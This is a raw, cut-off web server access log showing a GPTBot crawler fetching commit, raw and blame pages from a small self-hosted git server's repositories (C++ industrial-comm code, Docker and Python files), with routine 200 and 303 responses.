192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 21323] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12042] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11592] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?files=C%2b%2bProject" [Client 74.7.227.38] [Length 15194] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:16:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11909] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" -[17/Feb/2026:16:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode%2ftasks.json" [Client 74.7.227.38] [Length 25949] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:16:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:16:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/package.json" -[17/Feb/2026:16:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10439] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10678] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10440] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11910] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" -[17/Feb/2026:16:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14287] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:16:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:16:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16164] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14258] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16133] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate.csh" [Client 74.7.227.38] [Length 25043] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:16:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=source" [Client 74.7.227.38] [Length 30977] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:16:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13540] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:16:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13541] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:16:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13542] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:16:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11211] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:16:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" -[17/Feb/2026:16:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" -[17/Feb/2026:16:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 